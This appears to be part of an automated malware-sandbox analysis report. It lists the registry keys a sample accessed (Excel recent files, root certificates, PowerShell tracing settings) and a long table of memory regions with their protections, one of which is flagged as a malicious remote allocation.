HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35560
35560
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 80 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
547000
heap
page read and write
3C4E000
heap
page read and write
3E8000
heap
page read and write
5209000
heap
page read and write
52B000
heap
page read and write
1AB90000
heap
page read and write
357F000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
440000
heap
page read and write
4C57000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
4D02000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
1CB1E000
stack
page read and write
14D000
heap
page read and write
2955000
trusted library allocation
page read and write
609000
heap
page read and write
4B87000
heap
page read and write
20000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
4F7F000
heap
page read and write
125000
heap
page read and write
2C0000
trusted library allocation
page read and write
3870000
heap
page read and write
3BAF000
heap
page read and write
51B0000
heap
page read and write
38D000
heap
page read and write
1A190000
heap
page read and write
4F92000
heap
page read and write
1B80000
heap
page read and write
1D94000
heap
page read and write
5B5000
heap
page read and write
7FE898D2000
trusted library allocation
page read and write
2B40000
heap
page read and write
500000
heap
page read and write
4F7E000
heap
page read and write
486000
heap
page read and write
389F000
stack
page read and write
130000
direct allocation
page read and write
D3000
heap
page read and write
4CCC000
heap
page read and write
3C34000
heap
page read and write
4F40000
heap
page read and write
3579000
trusted library allocation
page read and write
5FA000
heap
page read and write
4D06000
heap
page read and write
4F78000
heap
page read and write
1E24000
heap
page read and write
246000
stack
page read and write
4A68000
heap
page read and write
4190000
trusted library allocation
page read and write
15C000
stack
page read and write
1AB9D000
heap
page read and write
1A8A4000
heap
page execute and read and write
2C9000
heap
page read and write
4D0E000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
69E000
stack
page read and write
1A1CE000
heap
page read and write
4E30000
heap
page read and write
1D56000
heap
page read and write
615000
heap
page read and write
5A9000
heap
page read and write
26A3000
trusted library allocation
page read and write
1B6000
heap
page read and write
41E000
heap
page read and write
4380000
trusted library allocation
page read and write
2F1000
stack
page read and write
451F000
stack
page read and write
4DB7000
heap
page read and write
1F6F000
stack
page read and write
4F9B000
heap
page read and write
1AC19000
heap
page read and write
2CC000
heap
page read and write
7FE899C6000
trusted library allocation
page execute and read and write
D3000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
359F000
trusted library allocation
page read and write
4F88000
heap
page read and write
5A9000
heap
page read and write
4E32000
heap
page read and write
383000
heap
page read and write
1F0000
heap
page read and write
3D0000
heap
page read and write
4F33000
heap
page read and write
274D000
trusted library allocation
page read and write
5209000
heap
page read and write
48F000
direct allocation
page read and write
7FE89C20000
trusted library allocation
page read and write
3BE5000
heap
page read and write
4CDA000
heap
page read and write
7FE89AB2000
trusted library allocation
page read and write
44D000
heap
page read and write
20000
heap
page read and write
3580000
trusted library allocation
page read and write
540000
heap
page read and write
BA000
heap
page read and write
540000
heap
page read and write
3B3000
heap
page read and write
4D3000
heap
page read and write
1D70000
direct allocation
page read and write
3A9D000
stack
page read and write
3BD6000
heap
page read and write
1D40000
heap
page execute and read and write
4F39000
heap
page read and write
1AEFE000
stack
page read and write
435000
heap
page read and write
3862000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
3A6000
heap
page read and write
4F99000
heap
page read and write
4E32000
heap
page read and write
1B6000
heap
page read and write
496B000
trusted library allocation
page read and write
1A82D000
heap
page read and write
1D0000
trusted library allocation
page read and write
4761000
heap
page read and write
3DB000
heap
page read and write
3659000
trusted library allocation
page read and write
30CC000
stack
page read and write
5202000
heap
page read and write
2297000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
4902000
heap
page read and write
3C90000
trusted library allocation
page read and write
81AE000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
2DB000
stack
page read and write
22E9000
trusted library allocation
page read and write
3C4A000
heap
page read and write
2C0000
heap
page read and write
27D0000
trusted library allocation
page read and write
4F99000
heap
page read and write
4B84000
heap
page read and write
3598000
trusted library allocation
page read and write
1C8EB000
stack
page read and write
1FD3000
direct allocation
page read and write
5209000
heap
page read and write
4B80000
heap
page read and write
3000000
trusted library allocation
page read and write
309000
heap
page read and write
365000
heap
page read and write
3587000
trusted library allocation
page read and write
1B90000
heap
page read and write
10000
heap
page read and write
1A0000
heap
page read and write
3E8000
heap
page read and write
4902000
heap
page read and write
1FC7000
direct allocation
page read and write
440000
heap
page read and write
1C3D3000
heap
page read and write
3BAF000
heap
page read and write
4FD1000
heap
page read and write
1B555000
heap
page read and write
467000
heap
page read and write
393000
heap
page read and write
4F99000
heap
page read and write
3C2E000
heap
page read and write
4D09000
heap
page read and write
55B000
heap
page read and write
1A1000
heap
page read and write
3C4D000
heap
page read and write
577000
heap
page read and write
2A4F000
stack
page read and write
4D02000
heap
page read and write
3C4A000
heap
page read and write
7FE89A97000
trusted library allocation
page read and write
7FE899F0000
trusted library allocation
page execute and read and write
51EE000
heap
page read and write
4F9B000
heap
page read and write
4900000
heap
page read and write
496A000
trusted library allocation
page read and write
1AB000
heap
page read and write
149000
heap
page read and write
7FE89990000
trusted library allocation
page execute and read and write
2299000
trusted library allocation
page read and write
3B0000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
1AF50000
heap
page read and write
4F99000
heap
page read and write
1FE0000
heap
page execute and read and write
51F8000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
5080000
heap
page read and write
484E000
trusted library allocation
page read and write
1C14B000
heap
page read and write
32D000
heap
page read and write
4F31000
heap
page read and write
7FE89AE4000
trusted library allocation
page read and write
5080000
heap
page read and write
1A750000
heap
page execute and read and write
4F33000
heap
page read and write
600000
heap
page read and write
1E53000
direct allocation
page read and write
4C50000
heap
page read and write
4E27000
heap
page read and write
7FE899F0000
trusted library allocation
page execute and read and write
490000
direct allocation
page read and write
419000
heap
page read and write
1BFF5000
heap
page read and write
500000
heap
page read and write
4D02000
heap
page read and write
3C3B000
heap
page read and write
51EE000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
4D1F000
heap
page read and write
14E000
heap
page read and write
4A5E000
heap
page read and write
1A73F000
stack
page read and write
1BE88000
stack
page read and write
4FA2000
heap
page read and write
52F0000
heap
page read and write
45A000
heap
page read and write
1C84A000
stack
page read and write
77AE000
trusted library allocation
page read and write
486000
heap
page read and write
398000
heap
page read and write
1A75F000
stack
page read and write
7FE89AB4000
trusted library allocation
page read and write
63AE000
trusted library allocation
page read and write
18F000
heap
page read and write
3C30000
heap
page read and write
2978000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
57E000
heap
page read and write
1BA0000
heap
page read and write
3841000
heap
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
4CD5000
heap
page read and write
4CCD000
heap
page read and write
1CD0000
heap
page read and write
4FD2000
heap
page read and write
185000
stack
page read and write
7FE89986000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
4670000
trusted library allocation
page read and write
1DFE000
stack
page read and write | page guard
4F67000
heap
page read and write
4F88000
heap
page read and write
4F71000
heap
page read and write
D0000
heap
page read and write
2176000
trusted library allocation
page read and write
1DD000
heap
page read and write
51F0000
heap
page read and write
1B45B000
stack
page read and write
49B000
remote allocation
page execute and read and write
500000
heap
page read and write
444000
heap
page read and write
4F87000
heap
page read and write
504000
heap
page read and write
3FCA000
stack
page read and write
38BE000
heap
page read and write
273A000
trusted library allocation
page read and write
1AA15000
stack
page read and write
4F99000
heap
page read and write
4DF8000
heap
page read and write
359E000
trusted library allocation
page read and write
1C3FE000
heap
page read and write
3C4000
heap
page read and write
4D02000
heap
page read and write
48F8000
heap
page read and write
530000
heap
page read and write
8BAE000
trusted library allocation
page read and write
4FC4000
heap
page read and write
1AB56000
heap
page read and write
5209000
heap
page read and write
4B96000
heap
page read and write
2C7000
heap
page read and write
38BA000
heap
page read and write
2975000
trusted library allocation
page read and write
1A268000
heap
page read and write
3867000
heap
page read and write
4E27000
heap
page read and write
5100000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
1C3C0000
heap
page read and write
3DF000
heap
page read and write
1E53000
direct allocation
page read and write
3579000
trusted library allocation
page read and write
1DE0000
direct allocation
page read and write
4CCC000
heap
page read and write
7FE89A83000
trusted library allocation
page read and write
20000
heap
page read and write
2D4000
heap
page read and write
504000
heap
page read and write
1B234000
heap
page read and write
51EE000
heap
page read and write
1ABC3000
heap
page read and write
35D000
heap
page read and write
1E40000
direct allocation
page read and write
2BC000
stack
page read and write
330000
heap
page read and write
7FE89A87000
trusted library allocation
page read and write
36A1000
heap
page read and write
4CDA000
heap
page read and write
C8000
heap
page read and write
35AA000
trusted library allocation
page read and write
3C39000
heap
page read and write
3C32000
heap
page read and write
2AE0000
trusted library allocation
page execute read
35F000
heap
page read and write
1FA0000
direct allocation
page read and write
4D03000
heap
page read and write
1C99C000
stack
page read and write
1B2C0000
heap
page read and write
10000
heap
page read and write
4F68000
heap
page read and write
3818000
heap
page read and write
48FA000
heap
page read and write
122A1000
trusted library allocation
page read and write
1A1000
heap
page read and write
4FCB000
heap
page read and write
39E0000
trusted library allocation
page read and write
1FA000
heap
page read and write
1A080000
heap
page read and write
4AAD000
heap
page read and write
2680000
heap
page read and write
1A26B000
heap
page read and write
297000
heap
page read and write
3BD2000
heap
page read and write
2F0000
trusted library allocation
page read and write
455000
heap
page read and write
2121000
trusted library allocation
page read and write
5EF000
heap
page read and write
4FCB000
heap
page read and write
1E00000
heap
page execute and read and write
2EBF000
stack
page read and write
522000
heap
page read and write
459000
heap
page read and write
346000
heap
page read and write
504000
heap
page read and write
520A000
heap
page read and write
5080000
heap
page read and write
14D000
heap
page read and write
365C000
trusted library allocation
page read and write
4D75000
heap
page read and write
3D9000
heap
page read and write
9FAE000
trusted library allocation
page read and write
4F84000
heap
page read and write
4FAE000
trusted library allocation
page read and write
3D7E000
stack
page read and write
19C000
heap
page read and write
4F29000
heap
page read and write
680000
heap
page read and write
380000
heap
page read and write
1B27C000
stack
page read and write
47CC000
heap
page read and write
495B000
stack
page read and write
1DD000
heap
page read and write
5D7000
heap
page read and write
194000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
467000
heap
page read and write
1BE0000
heap
page read and write
3C3B000
heap
page read and write
1C1AE000
stack
page read and write
4F9B000
heap
page read and write
1272000
unkown
page execute read
935000
heap
page read and write
5375000
heap
page read and write
3C26000
heap
page read and write
4D0E000
heap
page read and write
10000
heap
page read and write
371000
heap
page read and write
37B000
heap
page read and write
7FE89980000
trusted library allocation
page read and write
3C4A000
heap
page read and write
618000
heap
page read and write
7FE89A93000
trusted library allocation
page read and write
2974000
trusted library allocation
page read and write
2681000
trusted library allocation
page read and write
4F99000
heap
page read and write
4906000
heap
page read and write
6A0000
heap
page read and write
1B20000
trusted library allocation
page read and write
28C0000
heap
page read and write
7FE898D3000
trusted library allocation
page execute and read and write
1C158000
heap
page read and write
16A000
heap
page read and write
1E20000
direct allocation
page read and write
4FC4000
heap
page read and write
4F99000
heap
page read and write
7FE89BCE000
trusted library allocation
page read and write
3C0000
heap
page read and write
20D7000
trusted library allocation
page read and write
4F99000
heap
page read and write
2391000
trusted library allocation
page read and write
2FF000
heap
page read and write
3829000
heap
page read and write
373000
heap
page read and write
4CD7000
heap
page read and write
3260000
trusted library allocation
page read and write
3BE5000
heap
page read and write
3BD5000
heap
page read and write
1A8A0000
heap
page execute and read and write
48C000
heap
page read and write
4CFA000
heap
page read and write
4FCB000
heap
page read and write
4F99000
heap
page read and write
7FE898F0000
trusted library allocation
page read and write
1C2000
heap
page read and write
3818000
heap
page read and write
4AAD000
heap
page read and write
102000
stack
page read and write
470000
direct allocation
page read and write
36DC000
heap
page read and write
192000
heap
page read and write
3E9000
heap
page read and write
95AE000
trusted library allocation
page read and write
7FE898DD000
trusted library allocation
page execute and read and write
4A5C000
heap
page read and write
4BF9000
heap
page read and write
3C3B000
heap
page read and write
463000
heap
page read and write
4C57000
heap
page read and write
4CD5000
heap
page read and write
26DD000
trusted library allocation
page read and write
59A000
heap
page read and write
2659000
heap
page read and write
1C418000
heap
page read and write
3DA000
heap
page read and write
455000
heap
page read and write
1B85000
heap
page read and write
45AE000
trusted library allocation
page read and write
4F7E000
heap
page read and write
1BD6000
heap
page read and write
1B0000
direct allocation
page read and write
1F4000
heap
page read and write
4B80000
heap
page read and write
4F88000
heap
page read and write
78000
heap
page read and write
21A000
heap
page read and write
4FCF000
heap
page read and write
1FA000
heap
page read and write
4968000
trusted library allocation
page read and write
522000
heap
page read and write
10000
heap
page read and write
5209000
heap
page read and write
4F00000
heap
page read and write
3598000
trusted library allocation
page read and write
910000
heap
page read and write
1AC13000
heap
page read and write
58B000
heap
page read and write
4902000
heap
page read and write
10000
heap
page read and write
1C8000
heap
page read and write
4CD7000
heap
page read and write
35A6000
trusted library allocation
page read and write
4F88000
heap
page read and write
48C000
heap
page read and write
51EF000
heap
page read and write
1AD000
direct allocation
page read and write
320000
trusted library allocation
page read and write
7FE89A8C000
trusted library allocation
page read and write
543000
heap
page read and write
3841000
heap
page read and write
1C0000
heap
page read and write
4D02000
heap
page read and write
4FD2000
heap
page read and write
1DD000
heap
page read and write
DE000
heap
page read and write
4F33000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
7FE898E3000
trusted library allocation
page read and write
504000
heap
page read and write
7FE898E3000
trusted library allocation
page read and write
1A31D000
stack
page read and write
149000
heap
page read and write
16E000
heap
page read and write
1C3D0000
heap
page read and write
356F000
stack
page read and write
452000
heap
page read and write
4FBE000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
5209000
heap
page read and write
437000
heap
page read and write
392000
heap
page read and write
7FE89A87000
trusted library allocation
page read and write
250000
heap
page read and write
3C3D000
heap
page read and write
3F8000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
1A7D9000
stack
page read and write
5570000
trusted library allocation
page read and write
7FE898E3000
trusted library allocation
page execute and read and write
7FE8998C000
trusted library allocation
page execute and read and write
3760000
trusted library allocation
page read and write
3BC6000
heap
page read and write
4838000
trusted library allocation
page read and write
3598000
trusted library allocation
page read and write
19E000
heap
page read and write
4F7E000
heap
page read and write
1019000
trusted library allocation
page read and write
362000
heap
page read and write
4862000
heap
page read and write
387000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
4F9B000
heap
page read and write
4CD7000
heap
page read and write
1F80000
direct allocation
page read and write
25F0000
trusted library allocation
page execute read
5B8000
heap
page read and write
4FC8000
heap
page read and write
4A68000
heap
page read and write
4AAD000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
448000
heap
page read and write
4A6E000
heap
page read and write
287C000
trusted library allocation
page read and write
4F84000
heap
page read and write
CFD000
heap
page read and write
359000
heap
page read and write
1B0000
heap
page read and write
357D000
trusted library allocation
page read and write
315B000
stack
page read and write
4F99000
heap
page read and write
4F75000
heap
page read and write
2985000
trusted library allocation
page read and write
4B46000
heap
page read and write
5379000
heap
page read and write
4CFA000
heap
page read and write
4FD2000
heap
page read and write
4D09000
heap
page read and write
37D9000
heap
page read and write
5A0000
heap
page read and write
4CFA000
heap
page read and write
522000
heap
page read and write
4F8D000
heap
page read and write
3DE000
heap
page read and write
2322000
trusted library allocation
page read and write
1A8A8000
heap
page execute and read and write
10000
heap
page read and write
4CCC000
heap
page read and write
4D04000
heap
page read and write
4D02000
heap
page read and write
4180000
heap
page read and write
5A0000
heap
page read and write
3CE000
heap
page read and write
2940000
remote allocation
page read and write
2E40000
trusted library allocation
page read and write
3DE000
heap
page read and write
365A000
trusted library allocation
page read and write
3AA0000
trusted library allocation
page read and write
5370000
heap
page read and write
4B80000
heap
page read and write
4FC4000
heap
page read and write
37A000
stack
page read and write
3577000
trusted library allocation
page read and write
1A7E0000
heap
page read and write
501A000
heap
page read and write
4960000
trusted library allocation
page read and write
190000
trusted library section
page read and write
4F71000
heap
page read and write
36A0000
heap
page read and write
3EC000
heap
page read and write
4D0D000
heap
page read and write
EEF000
stack
page read and write
52F0000
heap
page read and write
2120000
heap
page execute and read and write
376000
heap
page read and write
1A21E000
heap
page read and write
4AAE000
heap
page read and write
12297000
trusted library allocation
page read and write
1C07F000
stack
page read and write
1B50000
trusted library allocation
page read and write
1B29F000
stack
page read and write
38B6000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
1C2000
stack
page read and write
1C02B000
heap
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
5A2000
heap
page read and write
7FE8998C000
trusted library allocation
page execute and read and write
4D0E000
heap
page read and write
286000
heap
page read and write
3599000
trusted library allocation
page read and write
38C0000
heap
page read and write
3B50000
trusted library allocation
page read and write
1A8AA000
heap
page read and write
1A2F0000
heap
page read and write
359E000
trusted library allocation
page read and write
1E70000
heap
page read and write
3575000
trusted library allocation
page read and write
2592000
trusted library allocation
page read and write
5209000
heap
page read and write
1AB28000
stack
page read and write
3C2E000
heap
page read and write
49A000
heap
page read and write
3CDE000
trusted library allocation
page read and write
525000
heap
page read and write
294C000
trusted library allocation
page read and write
4BA2000
heap
page read and write
3FF000
heap
page read and write
2F3000
heap
page read and write
1B2C4000
heap
page read and write
3573000
trusted library allocation
page read and write
1B12F000
stack
page read and write
35A2000
trusted library allocation
page read and write
4CCC000
heap
page read and write
4A1B000
heap
page read and write
35A0000
trusted library allocation
page read and write
50E000
heap
page read and write
300000
heap
page read and write
4961000
heap
page read and write
1B76000
heap
page read and write
47E000
heap
page read and write
784000
heap
page read and write
1BBB000
heap
page read and write
CC000
heap
page read and write
4BF000
heap
page read and write
334000
heap
page read and write
122000
heap
page read and write
1A81A000
stack
page read and write
4F87000
heap
page read and write
480D000
heap
page read and write
295E000
trusted library allocation
page read and write
4320000
trusted library allocation
page read and write
1B94000
heap
page read and write
4FCB000
heap
page read and write
35A7000
trusted library allocation
page read and write
2DC000
heap
page read and write
1DC0000
direct allocation
page read and write
3C3F000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
340000
heap
page read and write
4F7F000
heap
page read and write
7FE89990000
trusted library allocation
page read and write
4BF000
heap
page read and write
228F000
stack
page read and write
3AA0000
trusted library allocation
page read and write
4D0000
heap
page read and write
49C6000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
210E000
stack
page read and write | page guard
2C9000
heap
page read and write
107000
heap
page read and write
460000
heap
page read and write
7FE898D4000
trusted library allocation
page read and write
3575000
trusted library allocation
page read and write
20000
heap
page read and write
1B36E000
stack
page read and write
1B230000
heap
page read and write
1EF0000
heap
page read and write
4F88000
heap
page read and write
1A89E000
heap
page read and write
56E000
heap
page read and write
3C4F000
heap
page read and write
4D09000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
3653000
trusted library allocation
page read and write
4F31000
heap
page read and write
53D000
heap
page read and write
482E000
trusted library allocation
page read and write
4F40000
heap
page read and write
2742000
trusted library allocation
page read and write
3C39000
heap
page read and write
4FCB000
heap
page read and write
1F00000
heap
page read and write
4B97000
heap
page read and write
1A7E4000
heap
page read and write
185000
heap
page read and write
3C80000
heap
page read and write
4FC4000
heap
page read and write
4D02000
heap
page read and write
399E000
stack
page read and write
230F000
trusted library allocation
page read and write
207F000
stack
page read and write
1B130000
heap
page read and write
617000
heap
page read and write
1A1000
heap
page read and write
3573000
trusted library allocation
page read and write
2959000
trusted library allocation
page read and write
1AB000
heap
page read and write
1AB50000
heap
page read and write
4F90000
heap
page read and write
1DFF000
stack
page read and write
1D20000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
2291000
trusted library allocation
page read and write
7FE89C20000
trusted library allocation
page read and write
4CD7000
heap
page read and write
371000
heap
page read and write
5170000
heap
page read and write
40E000
heap
page read and write
3657000
trusted library allocation
page read and write
12130000
trusted library allocation
page read and write
30F000
heap
page read and write
28FB000
heap
page read and write
1E20000
heap
page read and write
4FCB000
heap
page read and write
358C000
stack
page read and write
7FE89BB0000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
4CDA000
heap
page read and write
4D0D000
heap
page read and write
1FD3000
direct allocation
page read and write
4A5C000
heap
page read and write
4A0000
remote allocation
page execute and read and write
36E8000
heap
page read and write
1CD4000
heap
page read and write
1A1000
heap
page read and write
2655000
heap
page read and write
4830000
trusted library allocation
page read and write
1B42C000
stack
page read and write
36D6000
heap
page read and write
4FC4000
heap
page read and write
3590000
trusted library allocation
page read and write
1E00000
direct allocation
page read and write
295B000
trusted library allocation
page read and write
390000
heap
page read and write
29D0000
trusted library allocation
page execute
1AC5A000
stack
page read and write
1B5F0000
heap
page read and write
2D0000
trusted library allocation
page read and write
3BF000
heap
page read and write
3845000
heap
page read and write
4B96000
heap
page read and write
27AE000
trusted library allocation
page read and write
1B40000
heap
page read and write
21A0000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
3F8000
stack
page read and write
1CE0000
heap
page read and write
95D000
heap
page read and write
4E30000
heap
page read and write
12291000
trusted library allocation
page read and write
4F99000
heap
page read and write
22BB000
trusted library allocation
page read and write
4F99000
heap
page read and write
47CC000
heap
page read and write
2E0000
trusted library allocation
page read and write
2650000
heap
page read and write
1C130000
heap
page read and write
38C0000
trusted library allocation
page read and write
473000
direct allocation
page read and write
1A754000
heap
page execute and read and write
3A80000
trusted library allocation
page read and write
4E2A000
heap
page read and write
7FE89AC0000
trusted library allocation
page execute and read and write
1B58B000
heap
page read and write
1F6000
heap
page read and write
7FE89A00000
trusted library allocation
page execute and read and write
2310000
heap
page execute and read and write
467000
heap
page read and write
309000
heap
page read and write
1C2000
heap
page read and write
7FE89AD8000
trusted library allocation
page read and write
2779000
trusted library allocation
page read and write
4F38000
heap
page read and write
7FE89986000
trusted library allocation
page read and write
20000
heap
page read and write
4CD5000
heap
page read and write
1C1AB000
heap
page read and write
4F8F000
heap
page read and write
206000
heap
page read and write
2280000
trusted library allocation
page read and write
3CE9000
trusted library allocation
page read and write
4F88000
heap
page read and write
332000
heap
page read and write
25D2000
trusted library allocation
page read and write
4F01000
heap
page read and write
21D000
heap
page read and write
4F01000
heap
page read and write
4C50000
heap
page read and write
4F9D000
heap
page read and write
3450000
remote allocation
page read and write
4F8D000
heap
page read and write
7FE89AD0000
trusted library allocation
page execute and read and write
59D000
heap
page read and write
2EF000
trusted library allocation
page read and write
3CE000
stack
page read and write
4BCA000
heap
page read and write
1A81F000
heap
page read and write
24B000
stack
page read and write
3C50000
trusted library allocation
page read and write
5595000
heap
page read and write
1FA000
heap
page read and write
2AFF000
stack
page read and write
1AB94000
heap
page read and write
1C2000
heap
page read and write
1AA3E000
stack
page read and write
3B50000
heap
page read and write
2282000
trusted library allocation
page read and write
4A0B000
heap
page read and write
60E000
heap
page read and write
39C000
heap
page read and write
1ABB6000
heap
page read and write
48C000
heap
page read and write
7FE89A9C000
trusted library allocation
page read and write
1A25C000
heap
page read and write
1B170000
heap
page read and write
D3000
heap
page read and write
4B82000
heap
page read and write
4A68000
heap
page read and write
1EB0000
heap
page read and write
35AC000
trusted library allocation
page read and write
22CA000
trusted library allocation
page read and write
7FE89B61000
trusted library allocation
page read and write
3BAF000
heap
page read and write
4B87000
heap
page read and write
294000
heap
page read and write
5080000
heap
page read and write
4960000
heap
page read and write
250E000
trusted library allocation
page read and write
2F3000
heap
page read and write
1F20000
direct allocation
page read and write
4FC6000
heap
page read and write
1C84000
heap
page read and write
193000
direct allocation
page read and write
4810000
trusted library allocation
page read and write
35AA000
trusted library allocation
page read and write
27CF000
stack
page read and write
4B96000
heap
page read and write
3CEF000
trusted library allocation
page read and write
1F40000
direct allocation
page read and write
1C3BF000
stack
page read and write
5100000
trusted library allocation
page read and write
4D3000
heap
page read and write
20000
heap
page read and write
431000
heap
page read and write
1D0000
heap
page read and write
4F99000
heap
page read and write
1D50000
direct allocation
page read and write
1E47000
direct allocation
page read and write
555000
heap
page read and write
1A1D8000
heap
page execute and read and write
3E7000
heap
page read and write
104000
heap
page read and write
51F2000
heap
page read and write
2081000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page execute and read and write
7FE89BA0000
trusted library allocation
page read and write
293F000
stack
page read and write
4CC9000
heap
page read and write
1B9000
heap
page read and write
4CD7000
heap
page read and write
39C000
heap
page read and write
330000
heap
page read and write
1BD6000
heap
page read and write
7FE898F3000
trusted library allocation
page read and write
3BD0000
heap
page read and write
4B87000
heap
page read and write
4959000
heap
page read and write
4C57000
heap
page read and write
1C439000
heap
page read and write
40E0000
trusted library allocation
page read and write
2C0000
heap
page read and write
36D7000
heap
page read and write
3BD0000
heap
page read and write
3AB0000
heap
page read and write
1A220000
heap
page read and write
1A1D5000
heap
page read and write
389000
heap
page read and write
4FCE000
heap
page read and write
1C92F000
stack
page read and write
2F7C000
trusted library allocation
page read and write
4FC4000
heap
page read and write
4D3000
heap
page read and write
310000
heap
page read and write
127A000
unkown
page readonly
1A20E000
heap
page execute and read and write
3BAE000
trusted library allocation
page read and write
500000
heap
page read and write
3582000
trusted library allocation
page read and write
4E32000
heap
page read and write
484E000
trusted library allocation
page read and write
3BF000
heap
page read and write
4B88000
heap
page read and write
1A8DE000
heap
page execute and read and write
46E000
heap
page read and write
37E0000
heap
page read and write
4F33000
heap
page read and write
3653000
trusted library allocation
page read and write
3867000
heap
page read and write
3C26000
heap
page read and write
538000
heap
page read and write
4FC4000
heap
page read and write
3B5D000
heap
page read and write
100000
heap
page read and write
1F60000
direct allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
4CD7000
heap
page read and write
315000
heap
page read and write
4B01000
heap
page read and write
1AF000
direct allocation
page read and write
10000
heap
page read and write
365B000
trusted library allocation
page read and write
4765000
heap
page read and write
3C4A000
heap
page read and write
4F9A000
heap
page read and write
12121000
trusted library allocation
page read and write
4CD7000
